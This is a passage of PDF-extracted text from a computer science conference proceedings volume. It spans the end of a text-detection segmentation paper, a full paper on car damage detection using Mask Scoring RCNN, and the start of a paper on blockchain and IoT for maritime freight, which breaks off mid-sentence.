5.2 Qualitative Results The ICDAR 2015 dataset is a very challenging dataset. Text inside its images figures in many orientations and many sizes. In some cases, text has a very tiny size and is located in some areas that make the prediction harder. In addition, many pictures suffer from image weaknesses like blur, fade and saturation. Even under such challenges, we can observe that our model is doing a good job. Figure 3 shows some examples of predictions made by our model. It is clear that our model functions correctly and it is able to detect text in any size or orientation. Nevertheless, it should be noted that our model is still having problems to extract text, especially when the quality of the image is low or when the size of text is very tiny.

6 Conclusion In this paper, we have presented a semantic segmentation architecture to create masks over text inside images. Our proposed method works fine with text in multi-orientations and with various sizes. The shape of our architecture is inspired from the UNet model and tries to benefit from the attention mechanism. The model performances are correct. They can be improved by adding mode training images and more training epochs. The next step should be the integration of a new output branch with the aim being to predict the coordinate of the quadrangle surrounding the text area.

366

S. Naim and N. Moumkine

References 1. Bagri, N., Johari, P.K.: A comparative study on feature extraction using texture and shape for content based image retrieval. Int. J. Adv. Sci. Technol. 80, 41–52 (2015). https://doi.org/10. 14257/ijast.2015.80.04 2. Greenhalgh, J., Mirmehdi, M.: Real-time detection and recognition of road traffic signs. IEEE Trans. Intell. Transp. Syst. 13(4), 1498–1506 (2012) 3. Shi, C., Wang, C., Xiao, B., Zhang, Y., Gao, S.: Scene text detection using graph model built upon maximally stable extremal regions. Pattern Recogn. Lett. 34(2), 107–116 (2013) 4. Pan, Y.F., Hou, X., Liu, C.L.: A hybrid approach to detect and localize texts in natural scene images. IEEE Trans. Image Process. 20(3), 800–813 (2010) 5. Lee, J.J., Lee, P.H., Lee, S.W., Yuille, A., Koch, C.: Adaboost for text detection in natural scene. In: 2011 International Conference on Document Analysis and Recognition, pp 429–434 (2011a) 6. Coates, A., et al.: Text detection and character recognition in scene images with unsupervised feature learning. In: IEEE International Conference on Document Analysis and Recognition, pp 440–445 (2011) 7. Yao, C., Bai, X., Sang, N., Zhou, X., Zhou, S., Cao, Z.: Scene text detection via holistic,multichannel prediction (2016). arXiv preprint arXiv:1606.09002 8. Zhu, Y., Yao, C., Bai, X.: Scene text detection and recognition: recent advances and future trends. Front. Comp. Sci. 10(1), 19–36 (2016) 9. Neumann, L., Matas, J.: Real-time scene text localization and recognition. In 2012 IEEE conference on computer vision and pattern recognition (CVPR) (pp. 3538–3545). IEEE (2012) 10. Zhou, X., et al.: EAST: an efficient and accurate scene text detector. In The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) (2017) 11. Li, X., Chen, H., Qi, X., Dou, Q., Fu, C.-W., Heng, P.-A.: H-DenseUNet: hybrid densely connected UNet for liver and tumor segmentation from CT volumes. IEEE Trans. Med. Imaging 37(12), 2663–2674 (Dec.2018). https://doi.org/10.1109/TMI.2018.2845918 12. Huang, G., Liu, Z., Weinberger, K.Q., van der Maaten, L.: Densely connected convolutional networks. arXiv:1608.06993 (2016) 13. Hu, J., Shen, L., Sun, G.: Squeeze-and-Excitation Networks. IEEE/CVF Conf. Comput. Vis. Pattern Recogn. 2018, 7132–7141 (2018). https://doi.org/10.1109/CVPR.2018.00745 14. Karatzas, D., et al.: ICDAR 2015 competition on robust reading. In: Proceedings of the 13th International Conference Document Analysis Recognition (ICDAR), pp. 1156–1160 Aug (2015) 15. Kawa, S., Kawano, M.: An overview. In: Umehara, H., Okazaki, K., Stone, J.H., Kawa, S., Kawano, M. (eds.) IgG4-Related Disease, pp. 3–7. Springer, Tokyo (2014). https://doi.org/ 10.1007/978-4-431-54228-5_1 16. Zhu, Y., Yao, C., Bai, X.: Scene text detection and recognition: recent advances and future trends. Front. Comp. Sci. 10(1), 19–36 (2016). https://doi.org/10.1007/s11704-015-4488-0 17. Zhang, Z., Zhang, C., Shen, W., Yao, C., Liu, W., Bai, X.: Multi-oriented text detection with fully convolutional networks. arXiv preprint arXiv:1604.04018 (2016) 18. Epshtein, B., Ofek, E., Wexler, Y.: Detecting text in natural scenes with stroke width transform. In: Computer Vision and Pattern Recognition (CVPR), 2010 IEEE Conference on, pp. 2963– 2970. IEEE (2010) 19. Zamberletti, A., Noce, L., Gallo, I.: Text localization based on fast feature pyramids and multi-resolution maximally stable extremal regions. In: Jawahar, C.V., Shan, S. (eds.) ACCV 2014. LNCS, vol. 9009, pp. 91–105. Springer, Cham (2015). https://doi.org/10.1007/978-3319-16631-5_7

Semantic Segmentation Architecture for Text Detection

367

20. Gupta, A., Vedaldi, A., Zisserman, A.: Synthetic data for text localisation in natural images, pp. 2315–2324 (2016) 21. Zhang, Z., Zhang, C., Shen, W., Yao, C., Liu, W., Bai, X.: Multioriented text detection with fully convolutional networks. In: Computer Vision and Pattern Recognition (2016) 22. Dumoulin, V., Visin, F.: A guide to convolution arithmetic for deep learning (2016). arXiv preprint arXiv:1603.07285 23. Shelhamer, E., Long, J., Darrell, T.: Fully convolutional networks for semantic segmentation. IEEE Trans. Pattern Anal. Mach. Intell. 39(4), 640–651 (2017). https://doi.org/10.1109/ TPAMI.2016.2572683 24. Nair, V., Hinton, G.E.: Rectified linear units improve restricted boltzmann machines. In: ICML (2010)

Car Damage Detection Based on Mask Scoring RCNN Farah Oubelkas1(B) , Lahcen Moumoun1,2 , and Abdellah Jamali1,2 1 Hassan First University of Settat, Faculté Sciences et Technique, Settat, Morocco

[email protected] 2 Laboratoire de Recherche Informatique, Réseaux, Mobilité et Modélisation, Settat, Morocco

Abstract. The growth of the car industry is now closely linked to the rise of the number of car accidents. As a result, insurance companies must deal with several claims at the same time while also addressing claims leakage. To resolve these issues, we propose a car damage detection system based on Mask Scoring RCNN. The experiment first makes a dataset by collecting car damage pictures of different types and on different angels for pre-processing then use Mask scoring RCNN for training. It is envisaged that this method would assist insurance in correctly classifying the damage and reducing the time spent on damage detection. The test results demonstrate that the proposed system has better masking accuracy in the case of complex images, allowing the car damage detection duty to be completed swiftly and easily. Keywords: Computer vision · Mask Scoring RCNN · Car-damage detection · Mask detection accuracy

1 Introduction We live in the big data age, in which vast volumes of data are generated across all fields of research and industry. Nowadays, Deep learning is an innovative approach that is now gaining a lot of attention. Deep learning has also been effectively used to a variety of computer vision application challenges. One of the key research topis nowadays in computer vision is object detection. RCNN [1], Fast RCNN [3], Faster RCNN [10], Mask RCNN [1] are now the most common detection algorithms. However, they need a substantial quantity of training data, that is sometimes challenging to have. The detection frame’s positioning ability is restricted, and as the number of convolution layers rises, gradient vanishing problem frequently occurs. In order to resolve all these drawbacks, Mask Scoring RCNN was proposed [12]. In this paper, we propose a car damage segmentation and detection system based on Mask Scoring RCNN algorithm to mark the car damaged areas. This paper improves the default model’s architecture by optimizing the residual network (ResNet), adjusting the hyperparameters and the parameters of the anchor box in order to improve the accuracy of the model. This proposed system can be used by insurance companies to process claims rapidly. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 368–376, 2023. https://doi.org/10.1007/978-3-031-35251-5_36

Car Damage Detection Based on Mask Scoring RCNN

369

2 Related Work There are two types of instance segmentation methods now in use. The first type is based on detection, and the second one is based on segmentation. Detection based approaches use detectors to get the region of each instance and then predict the mask for each region. An example of such detectors is Faster RCNN. Mask RCNN is an instance segmentation algorithm that was developed based on Faster RCNN. It is actually an improved version of Faster RCNN. It can be used in different types of problematics: Object detection, semantic segmentation or instance segmentation. It was proposed first by He et al. [5]. Based on this new algorithm, Chen et al. (Liang-Chieh Chen, 2018) [8] introduce MaskLab; A new approach that improves the result of Mask RCNN by using position-sensitive scores. However, the mask instance segmentation isn’t perfect, and certain locations where damage isn’t visible can’t be segregated. The major problem of all these approaches sited above is that the score of the mask is based on the classification precision which is not accurate, resulting in a huge discrepancy in the prediction results. Segmentation based methods first employ pixel-level prediction to predict the category label and then use a clustering algorithm to group the pixels into various instances. To cluster the pixels [13] adopt spectral clustering. On the other hand, Baiet al. [11] utilized watershed algorithm to categorize pixels and forecast pixel-level energy levels. All these methods use the average pixel-level classification score to measure the quality of the instance mask. It is possible that the detection results are great, the classification score is high but the quality mask is low. Background clutter and occlusion can also contribute to this discrepancy. That is when detection score correction methods appeared. Their main focus is to correct the classification score for the detection box. Cheng et al. utilize a separated network to rectify the false positives samples’ score. SoftNMS [2] corrects the low score box by using the overlap between two boxes. While Tychsen-Smith et al. [6] propose Fitness NMS, a method that uses the IOU between the identified bounding boxes and their ground truth to adjust the detection score. Huang Z, Huang L, Gong Y et al. [12] propose Mask Scoring RCNN. The key distinction between the two methods is that the first one formulates box IOU prediction as a classification task while Mask Scoring RCNN formulates it as a regression task. Mask scoring RCNN is the method implemented in this paper in order to detect the car damage. It solves the problem we have with Mask RCNN which is using the classification confidence to measure the score of the mask. Instead, it proposes a new evaluation method by adding Mask IOU Head. It takes the ROI features and the predicted mask as an input to obtain the score of the model. Compared to other traditional detection methods, Mask scoring RCNN is extremely effective. It has been used to detect and classify domestic garbage [9], in the medical Field to detect Breast tumor [7], in Agriculture Field to detect apple flowers [14]. But it never been used in the field of car damage detection before. In this paper, we applied Mask Scoring RCNN to detect and segment the area of the damage. This can be useful for insurance companies to automate the process.

370

F. Oubelkas et al.

3 Proposed Method The car damage detection and segmentation model proposed based on Mask scoring RCNN implemented in this paper is shown in the Fig. 1 bellow.

Fig. 1. The flow of the car damage detection and segmentation system.

The first step of the flow process is the collection of the image. The image is labelled in Coco json format using LabelMe annotation tool. The image is fed to the Mask scoring RCNN for feature extraction, classification and segmentation. As an output, we get the car damage detection and the mask predicted. 3.1 Mask Scoring RCNN Mask Scoring RCNN is an instance segmentation framework, a Mask-RCNN with an additional MaskIOU head that predicts the Mask-IoU score. Figure 2 depicts the four steps of our proposed method based on Mask Scoring RCNN. The first step, known as feature extraction, employs ResNet-50 + FPN backbone architecture to obtain the corresponding feature map. The second step, known as regions of interest (RoIs) generation, extracts RoIs by RPN. The third step extracts RoI features via RoIAlign then executes frame regression, classification using softmax and a predicted mask by FCN. The last step known as MaskIoU head, aims to regress the IoU between the predicted mask and its ground truth mask. The goal of MaskIoU head is to regress the IoU between the predicted and the ground truth mask. In order to make the predicted mask have the same special size as the ROI feature, we employ a max pooling layer with a kernel size of 2 and a stride of 2 while concatenating. The Mask IoU head is made up of four convolutions layers and three fully connected layers. For the four convolution layers, we use Mask head and set the kernel size and filter number to 3 and 256 for each convolutional layer. For the three fully connected layers, we used the RCNN head and set the outputs to 1024 for the first

Car Damage Detection Based on Mask Scoring RCNN

371

two fully connected layers while the output of the final fully connected to five because we have 5 classes.

Fig. 2. Mask Scoring RCNN architecture

3.2 Transfer Learning In this paper, we have used the transfer learning method to shorten training time and avoid overfitting of the model. In addition to that, it was difficult to collect enough training data of different type of damages. We had a small dataset compared with the giant open-source datasets we can find online. Transfer learning is to transfer the knowledge gained from training a model in the source domain to new models to solve a target task. In this paper, the ResNet backbone network, a model trained on Coco Dataset, is used. We remove the last layers of the pretrained model and replace them with untrained layers. The default backbone network of Mask RCNN is ResNet101. However, if there are too many layers, the rate of the network structure will severely be slow. Instead, in this experiment, we used ResNet-50 based FPN network, that is, the number of layers: 50 in order to improve the running speed of the algorithm and the generalization performance of the model. The improved Resnet backbone architecture as shown in the Fig. 3 is now instead of using post-activation, it focuses more on using the pre-activation of weights layers. This has two advantages. First, back-propagation satisfies the requirement, and information transmission is unaffected. Second, the BN layer serves as a pre-activation layer, with the

372

F. Oubelkas et al.

term ‘pre’ referring to the weight of the convolutional layer. This improves the model’s regularization, as well as its generalization performance.

Fig. 3. ResNet V1 and ResNet V2 structure

4 Results and Discussion 4.1 Dataset 528 damaged car images were collected (for train and for test) from Google and daily photographs. Each image has a maximum of 5 damage types and a minimum of 1 type of damage. We tried to have different angles and different type of damages (headlamp, hood, rear bumper, front bumper and door). However, rear bumper damage is rare and has a few kinds, therefore it makes up just around 14% of the overall dataset. We had images of different sizes. In order to feed them to Mask Scoring RCNN, we had to normalize them using a script to 1024 * 1024 pixels. To train Mask Scoring RCNN, we didn’t just need the images but also the corresponding masks. The annotation of the dataset is done using LabelMe, it’s an opensource image annotation software, to label the damage area and make a mask to get the segmentation information of the damage in the car, as shown in the Fig. 4.

Car Damage Detection Based on Mask Scoring RCNN

373

Fig. 4. Labelme annotation image

4.2 Training Platform The model training is done in Ubuntu 64bit and a hardware environment of NVIDIA GeForce MX250, memory 16Go. The virtual environment must be as follows: – – – – – –

PyTorch ≥ 1.3 Python ≥ 3.6 torchvision that matches the PyTorch installation. OpenCV Pycocotools gcc & g + + ≥ 4.9

475 images were used for training and 52 images for testing. To better represent the benefits of Mask Scoring RCNN, in this paper, we used the same dataset to compare the results obtained using Mask Scoring RCNN and its precursor Mask RCNN. 4.3 Evaluation Metric To evaluate the performance of the proposed model, we use the mean intersection over union (MIoU). TP TP , Recall = TP+FN Precision = TP+FP Where TP is true positive, FP is false-positive and TN is true negative. 4.4 Results 52 car damage pictures were used to evaluate the model. Here is an example of the test results of Mask Scoring RCNN as shown in Figure bellow: The damage to be detected in the image has been precisely circled and labelled with the category of the damage.

374

F. Oubelkas et al.

Result 1

Result 2

Fig. 5. Mask Scoring RCNN test results

In the Fig. 5 Result 1, we have only one type of damage. It is correctly identified and marked. Result 2 is more challenging, there are different types of damage, and the two types (head lamp and front bumper) are intertwined. However, the segmentation and the identification may be demonstrated to be quite excellent. The two types of damage are correctly classified with a high accuracy score. After the analysis of the results of test dataset, it can be seen that the more complex the image, the lower the segmentation result. When the image’s background is perfect, even though we have intertwined different type of damages, the segmentation is good around 96%. Figure 6 identifies the accuracy of test dataset.

Mask Scoring RCNN Accuracy

Epochs Fig. 6. Accuracy of Mask Scoring RCNN

Car Damage Detection Based on Mask Scoring RCNN

375

4.5 Comparison with Mask RCNN In order to reflect the high detection performance of Mask Scoring RCNN, we compared its results with its predecessor Mask RCNN. The different types of damages to be identified in the image is overlapping.

Mask RCNN

Mask Scoring RCNN

Fig. 7. Comparison of test results between Mask RCNN and Mask Scoring RCNN.

The result of Mask Scoring RCNN in Fig. 7 shows that, while the different types of damages that exists in the image are not totally separated, the damage still can be detected and the classification is correct. While using the Mask RCNN, we can clearly notice that the classification and the segmentation was more challenging. The segmentation recognition becomes worse and the confidence score of classification is lower. Therefore, Mask Scoring RCNN is better. In general, we can see that Mask RCNN method has great identification accuracy but it can’t handle overlapping targets very well, while Mask Scoring RCNN is capable of completing both tasks: instance segmentation and classification perfectly, and has the most optimal output. It can be seen from Table 1 that the proposed Method of Mask Scoring RCNN outperforms Mask RCNN. As the table shows, the mask accuracy of Mask Scoring RCNN is 96.9% which is higher than Mask RCNN mask accuracy by 2.03%. In addition to that, we can notice that Mask Scoring RCNN is way faster than Mask RCNN which makes it a better choice than Mask RCNN. The accuracy of test results was encouraging; we had an accuracy rate of 70% in headlamp, 67,5% in door, 68% in hood, 64.6% in rear bumper, 71% in front bumper. Therefore, an average of 70% on the whole dataset.

376

F. Oubelkas et al. Table 1. Comparison of test results (Mask RCNN and Mask Scoring RCNN).

Algorithm

Mask Accuracy (MIoU) (%)

Total loss (%)

Running speed (fps)

Mask RCNN

95.93

0.198

4.27

Mask Scoring RCNN

96.9

0.181

4.71

5 Conclusion To resolve traffic accident compensation quickly, a detection algorithm based on deep learning and transfer learning is used. After testing, we demonstrate that the proposed car damage classification system based in Mask Scoring RCNN achieved great segmentation, classification and recognition results in different scenarios. However, there is always a room for improvement. In future work, having more data can definitely improve the training results and show the power of this chosen algorithm.

References 1. Abdulla, W.: Mask R-CNN for object detection and instance segmentation on Keras and TensorFlow. Github (2017) 2. Davis, L.S., Bodla, N.: Soft-NMS -- improving object detection with one line of code. In: Proceedings of the IEEE International Conference on Computer Vision (2017) 3. Girshick, R.: Fast R-CNN. In: International Conference on Computer Vision (ICCV) (2015) 4. Girshick, R.: Rich feature hierarchies for accurate object detection and semantic segmentation (2014) 5. He, K., Gkioxari, G.: Mask RCNN. In: ICCV, (pp. 2980–2988) (2017) 6. Tychsen-Smith, L., Petersson, L.: Improving object localization with fitness NMS and bounded IoU Loss. arXiv, p. 1711.00164 7. Lei, Y., He, X.: Breast tumor segmentation in 3D automatic breast ultrasound using Mask scoring R-CNN. Medical Physics (2021) 8. Chen, L.-C., Hermans, A.: MaskLab: instance segmentation by refining object detection with semantic and direction features. In: CVPR (2018) 9. Li, S., Ming, Y.: Garbage object recognition and classification based on mask scoring RCNN. In: International Conference on Culture-oriented Science & Technology (ICCST) (2020) 10. Sun, S.R.: Faster R-CNN: towards real-time object detection. In: Advances in Neural Information Processing Systems (NIPS) (2015) 11. Urtasun, M.B.: Deep watershed transform for in-stance segmentation. In: IEEE Conference on Computer Vision and Pattern Recognition, (pp. 2858–2866) (2017) 12. Wang, X., Huang, Z.: Mask Scoring R-CNN. In: CVPR (2019) 13. Liang, X., Wei, Y.: Proposal-free network for instance-level object segmentation. In: arXiv preprint arXi p.1509.02636 (2015) 14. Tian, Y.,Yang, G.: Instance segmentation of apple flowers using the improved mask R–CNN model. Biosyst. Eng. 193, 264–278 (2020). https://doi.org/10.1016/j.biosystemseng.2020. 03.008 15. Zhang, Q., Bian Bian, S., Chang, X.: Vehicle-damage-detection segmentation algorithm based on improved mask RCNN. IEEE Access, 6997–7004 (2020)

Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks M. H. Rziki1 , N. Mansour2(B) , A. E. Boukili2 , and M. B. Sedra3 1 Laboratoire Informatique et Applications, Formation Doctorale Théories et Applications,

Faculté des Sciences, Université Moulay Ismail, Meknès, Morocco 2 Equipe de Physique Théorique et Modélisation (PTM), Département de Physique Faculté des

Sciences et Techniques Errachidia, Université Moulay Ismail Errachidia, B. P N 509, Boutalamine, 52000 Errachidia, Morocco [email protected] 3 Material and Subatomic Physics Laboratory (LPMS), FSK, University Ibn Tofail, Kenitra, Morocco

Abstract. In the world of import-export, the transport of goods by sea is a must. Indeed, nearly 90% of world trade is carried out in this way. For this reason, companies and states compete in ingenuity to invent the container transport of tomorrow. The objective of this work is to study the role of the IoT and blockchain smart contracting technologies in the maritime transport networks of goods and whether it would bring a real added value in the case of a Logistics company. The results showcase the potentials of using blockchain smart contracting in the environment of maritime freight transport networks. Keywords: Internet of things · Big Data · Data analysis · Optimization · Blockchain · Maritime transport · Real-time decision

1 Introduction Maritime transport represents an important and competitive factor economically and financially for each company or country, the problems associated with this type of transport are the source of maritime traffic congestion producing centuries of lost time in total, inevitable traffic jams in the ports, losses of goods, and consequently enormous economic losses. In fact, ensuring the smooth transition and the proper routing of the ships, makes it possible to guarantee a smooth running of the journeys, the passengers and of course the goods, this makes it possible to be able to respect the deadlines for the orders that have been made. Big Data presents a potential solution to support maritime transport networks, for effective use, efficient use and better optimization of routes and costs, based on real-time information sharing between the various stakeholders. (Drivers, authorities, companies or others). Here we cite the enormous impact. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 377–389, 2023. https://doi.org/10.1007/978-3-031-35251-5_37

378

M. H. Rziki et al.

that IoT,blockchain and smart contracting technologies could have on the maritime industry. Blockchain technology finds many applications and is increasingly establishing itself as a safe, robust and efficient solution. Several sectors are taking a close interest in it and see blockchain as a new solution to address traceability and security issues. In the environment of maritime freight transport networks the blockchain it will be possible to eliminate and reduce the delays noticed for the authentication of documents and information. In this way, the goods will be able to circulate more freely and more quickly. Also the maritime sector is driven by a large number of actors. Examples include customs and port authorities, banks, shipping brokers and clearing houses, etc. Each actor intervenes at a specific stage of the supply chain and has a specific role to play. However, it should be noted that almost all documentation in the sector is paper-based. Sales contracts, agreements, port documents, letters of credit and other administrative documents are regularly subject to round trips. As the size of global trade ecosystems grows, the cost of trade documentation needed to process shipped goods soars. In addition, financial transactions take longer. To reduce this time and also act on the cost of operations, actors in the sector are increasingly considering turning to blockchain-based smart contracts. For good reason, this system promotes transparency, while reducing the risk of human error. Faced with this development, it becomes legitimate to question the place of this technology and the consequences induced by its generalization. To do this, it will be a question of focusing on the sector of maritime transport of containers, marked by strong challenges in terms of traceability of goods in order to realize the real impact and the consequences that this technology can bring. 1.1 Big Data, Blockchain and Internet of Things as Solution for Logistics and Freight Transportation Problems Numerous research carried out in the field of maritime transport to improve the integration of IoT solutions or to optimize intelligent transport systems. Yet very little research has investigated how to use real-time Big Data in shipping. The problem of this article relates to a study which aims to minimize traffic in order to optimize the voyage for a ship which travels a predefined route while maximizing the sharing of information between the various users and collaborators, based on the Big Data tools and its real-time exploitation, operational research and modeling of operating systems. In the context of the current work, it is an adaptation of the real-time BD and its tools to solve problems related to the maritime transport of goods. The work is divided into two parts: The first part which allows to understand how the Internet of things works and the relationship between the IoT and the maritime transport networks of goods. The second part concerns a proposed solution concrete example of the blockchain technology relates to the traceability of documents transport for this a feasibility analysis has been made as well as the procedure implementation of this adapted solution in the case of a Maritime freight Transportation.

Blockchain and IoT for Real-Time Decision Support

379

1.2 Overview of the Concept of Big Data Although Big Data is a buzzword in both academia and industry, its meaning is still shrouded in significant conceptual vagueness. The term is used to describe a wide range of concepts: from the technological ability to store, aggregate and process data, to the cultural change that is pervasively pervading business and society, both overwhelmed by information overload.[1]. To better understand what Big Data is, we distinguish the 3 Vs that define it: Volume, Speed and Variety. – Volume: The amount of data matters. With big data, you’ll have to process high volumes of low-density, unstructured data. This can be data of unknown value, such as Twitter data feeds, clickstreams on a web page or a mobile app, or sensor-enabled equipment. For some organizations, this might be tens of terabytes of data. For others, it may be hundreds of petabytes. – Velocity: Velocity is the fast rate at which data is received and (perhaps) acted on. Normally, the highest velocity of data streams directly into memory versus being written to disk. Some internet-enabled smart products operate in real time or near real time and will require real-time evaluation and action; – Variety: Variety refers to the many types of data that are available. Traditional data types were structured and fit neatly in a relational database. With the rise of big data, data comes in new unstructured data types. Unstructured and semistructured data types, such as text, audio, and video, require additional preprocessing to derive meaning and support metadata [3]. Figure 1 shows the proposed generic framework for the supply problem using big data analysis. The proposed framework presents ways to integrate the 3Vs aspect of Big Data and shows possible ways to bring interand intra-heterogeneity. [4] Big Data therefore makes it possible to analyze, measure and arbitrate any type of production, whether human or user feedback, it is therefore used to guide and improve decision-making in order to optimize the result. Operational Research and Optimization Operational research occupies a growing place in industry, logistics or transport [7], it can be defined as the set of rational methods and techniques oriented towards the search for the best choice in the way of operating with a view to achieve the desired result or the best possible result. It is part of the “decision aids” insofar as it offers conceptual models with a view to analyzing and controlling complex situations to enable decisionmakers to understand, assess the issues and arbitrate or make decisions. Most effective choices. This area makes extensive use of mathematical reasoning (logic, probabilities, data analysis) and process modeling. It is strongly linked to systems engineering, as well as information system management [8]. Operational research presents a set of scientific analysis methods (mathematical and computer) of organizational phenomena which deals with the maximization of a profit or the minimization of a cost, in order to make optimal or close decisions. Optimum in complex problems. Operation Reseach is a decision support tool. [12].

380

M. H. Rziki et al.

Fig. 1. Proposed framework for integrating big data into the supply problem

Among the basic techniques of operations research we can cite: modeling, decision theory, graph theory, search for a shortest path, scheduling, dynamic programming, simplex, linear programming, Markov chains, and simulation. The study that we are analyzing, concerns the use of Big Data in the field of maritime transport, it should be noted that maritime transport produces a large amount of data from various sources in the form of different formats, the authors of this scientific article have analyzed the current applications of Big Data in relation to the various Big Data innovations in maritime transport that are demonstrated, mainly applicable in port operations, weather routing, monitoring/tracking and security. After analysis, the authors concluded that big data analytics can provide indepth understanding of causalities and correlations in shipping, thereby improving decisionmaking. However, there are major challenges for efficiently collecting and processing data in maritime transport, such as technological challenges, challenges due to competitive conditions, etc. Finally, the authors offer a future perspective of the use of Big Data in maritime transport. [11].

Blockchain and IoT for Real-Time Decision Support

381

2 Big Data and IoT Technologies in Maritime Freight Transportation The Internet of Things (IoT) implies a profound evolution of the Internet that we know. It’s no longer about connecting tablets, computers, phones between them, but to make every element of the physical world communicate, abolishing in somehow the borders between physical objects and the virtual world. It is the character to both emerging, with very rapid growth, and multidimensional IoT – diversity the objects concerned, the possible cases of application, the associated technologies – which makes it difficult to understand social transformations and the impacts environmental effects caused by the massive development of the IoT. The Internet of Things (IoT) [5], is an essential component of Big Data. The important aspect of the Internet of Things is real time and allows to run analyzes simultaneously to make decisions in real time. Thus in the sector of maritime transport of goods which connects suppliers and their customers all over the world thanks to the maritime transport of containers for example we consider each box on a container ship is no longer just a box, but a computer specialized in the safe transport of goods around the world. A container is a connected object. Instead of tracking containers by hand or with a hand-held bar code reader, IoT sensors can automate much of the process. Here are some ways that logistics technology can help the maritime industry. Tracking cargo: Shippers and maritime companies can track where cargo is based on IoT sensors on the smart container, or on the items inside. This can save time for all parties, and the shipper or freight forwarder can follow the items as they cross the ocean and get into port. Smart containers can be used to keep tabs on the goods inside, by monitoring and sharing alerts about ambient light and temperature changes. The smart containers can track doors opening and closing as well as other unexpected actions. They also share location, allowing users to know where it is at any given time. 2.1 Smart Containers One of the problems of the shipping container is its inactivity. During its useful life, a container spends more than half of the time in repositioning or inactivity. This is therefore an essential point to be optimized and to make tomorrow’s supply chains much more efficient. Now, the Smart Container [5] seems to be the key to solving this problem. Concretely, two 20ft Smart containers can be joined to form a single 40ft container. To do this, handling lasting approximately 30 min is enough, according to Francisco Aguilar, the co-founder of Connectainer. This simple and well-thought-out solution to a central problem in supply chain management would thus avoid 12% of unnecessary container movements in the context of international transport. The concept of the “Smart Container” consists of making the container intelligent so that it can communicate useful, targeted and real-time information. “Smart Containers”, like most connected objects, generate data that has the characteristics specific to Big Data: voluminous, heterogeneous, incomplete, sometimes erroneous, acquired and processed in near real time.

382

M. H. Rziki et al.

Using a box filled with sensors, these technologies make it possible to identify in real time remotely, and at all points of the journey the precise location of the container, its temperature, humidity, level of vibration or even door openings. Today, 80% of the volume of goods traded in the world transits by sea. Overall, there are 35 million maritime containers. However, according to the UN, a third of the food produced in the world for human consumption is lost or wasted, knowing that a significant part of these losses is due to a loss of quality of fresh food during transport due to changes in temperatures in refrigerated containers. The smart container is a solution for reducing waste by precisely detecting the places and times when the fresh food chain has been broken. It also makes it possible to generate a large amount of data. These can be strategic, both for shipowners, carriers, logisticians and for manufacturers, in order to reduce the number of incidents, anticipate the management of unforeseen events or anomalies, optimize inventory management and reduce transport costs. This solution provides an overview of all transport activity, and completes the digital supply chain.

3 Adoption of Blockchain in Maritime Freight Transportation How can we talk about the business issues of container transport, without mentioning safety and traceability ? On these questions, blockchain technology seems to be a perfectly adapted solution. In the maritime transport of goods by container, we cite some problems: Traceability and security issues, Verification processes are long and numerous: The journey is strewn with manual checks which require opening the containers several times and checking / verifying the goods transported and their condition. The documentation relating to container transport is also subject to frequent checks, and is still on paper. If a document is missing during a stage of the process, the entire container risks being immobilized. These several checks represent a significant extension of shipping times. During transport, it is essential to preserve the integrity of the products which must be shipped under certain environmental parameters. Blockchain technology is not limited solely to bitcoins and cryptocurrencies, but it finds many applications and is increasingly establishing itself as a safe, robust and efficient solution. Several sectors are taking a close interest in it and see blockchain as a new solution to address traceability and security issues. This is particularly the case in the transport of goods, the use of this technology for the maritime transport of goods will save the sector several billion dollars. At the same time, experiments are multiplying and using the blockchain as a means of tracing operations and products imported and exported around the world. Blockchain allows data to be recorded and tracked at every stage of a supply chain. For their part, suppliers of agri-food products could create a blockchain by adding information on the fertilizers used, the machines operated as well as on the pesticides. In any case, the blockchain is proving to be very useful for the sector. Data relating to storage conditions and shipment details can also be saved on the blockchain. The advantage is that they can be consulted at any time. Each actor in the supply chain can consult them whenever they wish, the blockchain will serve as a register

Blockchain and IoT for Real-Time Decision Support

383

to have all the information on the products. Thus, it will be possible to inform users about the hygiene conditions and the expiry date of the items. 3.1 What is Blockchain? Blockchain [5], is a technology that was born in 2008 by Satoshi Nakamoto. The blockchain was born thanks to the invention of “Bitcoin”, a digital currency that is not managed by the State or the banks, as it is electronically transferable and quickly. Although, the blockchain was created to store the history of transactions related to Bitcoin, over time this has been implemented in several sectors.[9] Blockchain technology is a decentralized information storage and transmission solution. The chain created by the different blocks of data is shared and distributed. This then allows everyone to verify its integrity and therefore the veracity of the information it contains. Container transport is subject to various stages of control throughout the journey, from the shipper to the end customer. During these checks (nearly 30 during international transport), the containers are opened during port examinations and documents are exchanged. Consequently, all these phases can be a source of error or embezzlement. However, the blockchain presents effective solutions related to the control and management of logistics flows. Blockchain Properties The blockchain realizes some important properties [2]. Decentralization: Data is replicated in a distributed network of nodes thus eliminating several risks that are present when data is stored centrally. There is no single point of failure; Tamper resistance: A consensus protocol used to validate the blocks of data appended to the ledger and the decentralized nature of the blockchain makes it extremely difficult for anyone to tamper with the data stored; Security: In addition to the security of the data in the form of immutability gained from the distributed consensus, blockchains use digital signatures and strong cryptographic primitives to sign and verify the data submitted to the network. Each user uses a private key to generate a signature for each blockchain transaction. This signature is used to confirm that the transaction came from that particular user and allows to verify its validity. The signature cannot be altered since it has been already issued [13]. All the data which makes up a blockchain is thus encoded. In order to perform some operations on data, you need to be in possession of the private key corresponding to that data, thus proving that you are entitled to make the operation, otherwise the blockchain node that received the request will simply discard it as invalid. 3.2 Problematic Solved by Blockchain Technology Better product traceability: The blockchain allows better reliability, because it improves the security and traceability of shipments. In the food sector, it is possible to quickly and simply trace the entire supply chain if a problem is detected. It is therefore a public

384

M. H. Rziki et al.

